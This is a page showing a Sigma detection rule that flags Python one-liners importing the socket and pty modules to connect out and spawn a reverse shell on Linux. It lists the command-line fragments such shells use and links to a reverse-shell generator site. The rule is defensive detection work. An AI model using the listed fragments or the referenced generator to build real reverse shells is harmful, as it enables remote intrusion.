Python Reverse Shell Execution Via PTY And Socket Modules
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
Sigma rule (View on GitHub)
1title: Python Reverse Shell Execution Via PTY And Socket Modules
2id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
3related:
4 - id: c4042d54-110d-45dd-a0e1-05c47822c937
5 type: similar
6status: test
7description: |
8 Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
9references:
10 - https://www.revshells.com/
11author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
12date: 2023-04-24
13modified: 2024-11-04
14tags:
15 - attack.execution
16logsource:
17 category: process_creation
18 product: linux
19detection:
20 selection:
21 Image|contains: 'python'
22 CommandLine|contains|all:
23 - ' -c '
24 - 'import'
25 - 'pty'
26 - 'socket'
27 - 'spawn'
28 - '.connect'
29 condition: selection
30falsepositives:
31 - Unknown
32level: high
References
-
Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.
Read More
Related rules
- Python Spawning Pretty TTY Via PTY Module
- Antivirus Exploitation Framework Detection
- Antivirus Hacktool Detection
- Potentially Suspicious Command Executed Via Run Dialog Box - Registry
- Binary Proxy Execution Via Dotnet-Trace.EXE